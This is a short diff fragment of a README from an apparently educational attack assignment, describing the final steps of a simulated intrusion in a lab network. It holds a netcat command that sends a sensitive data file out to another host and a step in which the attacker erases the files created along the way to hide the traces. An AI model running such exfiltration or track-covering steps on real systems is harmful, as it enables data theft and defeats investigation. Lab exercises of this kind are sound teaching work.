dragosbanica/cdci_assignment1_attack/README.md

 nc 172.17.0.3 5555 < /data/sensitive_data.txt

+## 7. Final step
-The attacker receives the sensitive data into stolen.txt.
+The attacker receives the sensitive data into stolen.txt and erases all the files that he created along the way on the machines.